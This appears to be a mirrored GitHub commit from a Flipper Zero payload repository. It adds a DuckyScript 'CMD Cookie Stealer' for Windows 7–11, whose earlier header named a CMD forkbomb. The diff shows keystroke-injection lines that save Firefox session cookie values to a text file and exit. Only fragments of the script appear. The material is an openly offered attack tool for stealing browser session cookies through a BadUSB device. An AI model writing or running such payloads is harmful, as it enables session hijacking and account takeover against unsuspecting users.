1
0
mirror of https://github.com/UberGuidoZ/Flipper.git synced 2025-04-27 12:47:31 +00:00

Added Cookie Stealer (thanks 7h30th3r0n3!)

This commit is contained in:
UberGuidoZ 2022-07-16 21:39:24 -07:00 committed by GitHub
parent 802f112eec
commit 50a8e1cbe4
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23

View File

@ -1,4 +1,4 @@
REM Title: CMD forkbomb REM Title: CMD Cookie Stealer
REM Author: 7h30th3r0n3 REM Author: 7h30th3r0n3
REM Target: Windows 7/8/10/11 REM Target: Windows 7/8/10/11
REM Version: 1.0 REM Version: 1.0
@ -34,4 +34,4 @@ ENTER
STRING Add-Content -Path cookie-firefox.txt -Value $session3 STRING Add-Content -Path cookie-firefox.txt -Value $session3
ENTER ENTER
STRING exit STRING exit
ENTER ENTER